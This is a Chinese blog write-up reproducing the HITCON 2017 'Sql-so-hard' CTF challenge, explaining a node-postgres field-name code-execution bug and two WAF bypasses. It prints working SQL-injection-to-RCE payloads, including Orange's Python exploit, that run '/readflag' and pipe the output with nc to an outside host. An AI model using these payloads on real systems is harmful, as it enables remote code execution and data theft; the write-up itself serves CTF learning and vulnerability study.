美文网首页CTFWriteupCTF
[hitcon2017] Sql-so-hard 复现

[hitcon2017] Sql-so-hard 复现

作者: Pr0ph3t | 来源:发表于2018-01-08 20:09 被阅读199次

最近实在是太多事情了Orz,所以没有及时更新复现。。(其实是偷懒

分享本题自制Dockerfile:Github

这道题涉及到的知识点:

  • mysql的max_allowed_packet
  • node-postgresql的一个RCE
  • postgresql中语句返回值的问题

本题连接了两个数据库 一个是mysql--用作waf之后ip和payload记录,另外一个是postgresql--用作注册时记录用户名称和密码

因为主要是分析大大的payload为主,这里的考察点主要是node-postgresql近期的一个RCE漏洞(https://node-postgres.com/announcements#2017-08-12-code-execution-vulnerability)

这个洞详细的分析P神已经在博客贴出来了(https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html)
并且复现环境p神也已经写了Dockerfile(https://github.com/vulhub/vulhub/tree/master/node/node-postgres)

简单来说就是客户端在获取表字段的时候因为转译不完全导致原本应该拼接在代码中的字段名被构造成了恶意代码传入了Function()这个类,这个类类似于PHP中的create_function,因为函数体可控 ,也就造成了命令执行。然后官方也有转译,但是官方的转译只是把' --> \' , 所以在前面加个\就能逃逸出来(逃逸后的字符串就是 \\'

所以这里的目的就很明确了 --> 通过postgresql的注入造成代码拼接命令执行
ß
但是会遇到两个问题:

  1. 这里postgresql存在注入 但是首先得绕过一大堆关键字waf
  2. 我们的ip不能在mysql留下记录 (这里的waf思路是如果有keyword则插入记录 后面再查询,如果有记录则拦截)

思路:

  • 造成Mysql插入出错
    提交一个很长很长的查询(默认包大小为16M),超出max_allowed_packet造成连接关闭,sql语句就不会执行 官方文档:

    max_allowed_packet
    这样没有插入的话就不会查询到记录,即达到绕过waf的目的
  • 或者使用postgreSQL支持将16进制的值转换成Unicode字符、并且可以自定义转译符的特性来将关键字全部替换掉, 从而达到绕过waf的目的, Eg: 国外大佬的wp(其中空格使用\t绕过,自定义转译符为感叹号)

','')\tON\tCONFLICT\t(username)\tDO\tUPDATE\tSET\tusername=''\tRETURNING\t1\tAS\tU&"!005c!0027+(r=process.mainModule.require,l=!0022!0022)]!002f!002f"\tUESCAPE\t'!',\t1\tAS\tU&"!005c!0027+(l+=!0022!002freadflag|nc!0020123.123!0022)]!002f!002f"\tUESCAPE\t'!',\t1\tAS\tU&"!005c!0027+(l+=!0022.123.123!00201234!0022)]!002f!002f"\tUESCAPE\t'!',\t1\tAS\tU&"!005c!0027+(r(!0022child_process!0022).execSync(l))]!002f!002f"\tUESCAPE\t'!';
  • 构造RCE代码2017-08-12 - code execution vulnerability
    目的是构造相应的字段名称造成RCE(详细原因请看P神关于漏洞的分析
    这里会出现新问题:
    • 不能控制insert的字段名,并且insert没有返回值(?)
    • 这里利用了分号切割sql语句,不能通过;闭合sql语句的方式构造RCE

这里阅读 文档, postgresql允许在insert或者update后选择一个或多个字段返回, 所以在这里就有可控字段名了, 使用格式 insert into xx(aa,bb) values('cc','dd') returning ee as ff;
最后就是构造RCE中P神在博客中提到的

单双引号都不能正常使用,我们可以使用es6中的反引号
Function环境下没有require函数, 不能获得child_process模块, 但是可以通过process.mainModule.constructor._load来代替require
一个fieldName只能有64位长度, 所以通过多个fieldName拼接来完成利用

最后是orange大大的exp:

from random import randint
import requests

# payload = "union"
payload = """','')/*%s*/returning(1)as"\\'/*",(1)as"\\'*/-(a=`child_process`)/*",(2)as"\\'*/-(b=`/readflag|nc 10.188.2.20 9999`)/*",(3)as"\\'*/-console.log(process.mainModule.require(a).exec(b))]=1//"--""" % (' '*1024*1024*16)


username = str(randint(1, 65535))+str(randint(1, 65535))+str(randint(1, 65535))
data = {
            'username': username+payload, 
                'password': 'AAAAAA'
                }
print 'ok'
r = requests.post('http://10.188.2.20:12345/reg', data=data);
print r.content

参考:
https://github.com/orangetw/My-CTF-Web-Challenges
https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html
https://github.com/vulhub/vulhub/tree/master/node/node-postgres
https://www.postgresql.org/docs/9.6/static/sql-syntax-lexical.html
https://www.postgresql.org/docs/9.5/static/dml-returning.html
https://github.com/sorgloomer/writeups/blob/master/writeups/2017-hitcon-quals/sql-so-hard.md
https://node-postgres.com/announcements#2017-08-12-code-execution-vulnerability

相关文章

  • [hitcon2017] Sql-so-hard 复现

    最近实在是太多事情了Orz,所以没有及时更新复现。。(其实是偷懒 分享本题自制Dockerfile:Github ...

  • SUCTF复盘

    当时没好好打,现在把环境复现一下对着wp撸一发。 WEB annonymous 这题原思路是HITCON2017的...

  • [hitcon2017] BabyFirst Revenge复现

    hitcon的题好难啊!!!!!还是太菜了。。Orz只能够赛后搭环境复现了。。分享本题自制Dockerfile:G...

  • [hitcon2017] SSRF Me复现

    分享本题自制Dockerfile:Github 题目给出了源码: 分析源码, 可以得到程序的流程是这样的: 和前面...

  • HITCON2017 babyfirst-revenge&Ba

    HITCON2017的题好难,同时对linux一无所知,这里复现哈,而且这里主要参考wp进行慢慢理解题目,学到了好...

  • hitcon2017 BabyFirst Revenge系列

    hitcon2017 BabyFirst Revenge系列 这次hitcon的web出了两个限制字符长度gets...

  • HITCON2017 ssrfme

    点开得到源代码,大概意思应该是先创建一个目录sandbox/md5(orange+你的ip),然后将传入的url使...

  • NetLogon 域内提权漏洞(CVE-2020-1472)

    NetLogon 域内提权漏洞(CVE-2020-1472)复现 摘要 影响版本 复现环境 漏洞脚本 复现开始 首...

  • HITCON2017 writeup(web)

    国际赛还是水准比较高的,题目都很有通用性 一、BabyFirst Revenge 源码: 五个字符的命令执行,这个...

  • ThinkPHP——ThinkPHP 5.x远程代码执行

    0x00目录 漏洞简介 影响版本 复现前提 复现环境 复现过程 总结 参考链接 0x01漏洞简介 ThinkPHP...

网友评论

    本文标题:[hitcon2017] Sql-so-hard 复现

    本文链接:https://www.haomeiwen.com/subject/wwcnixtx.html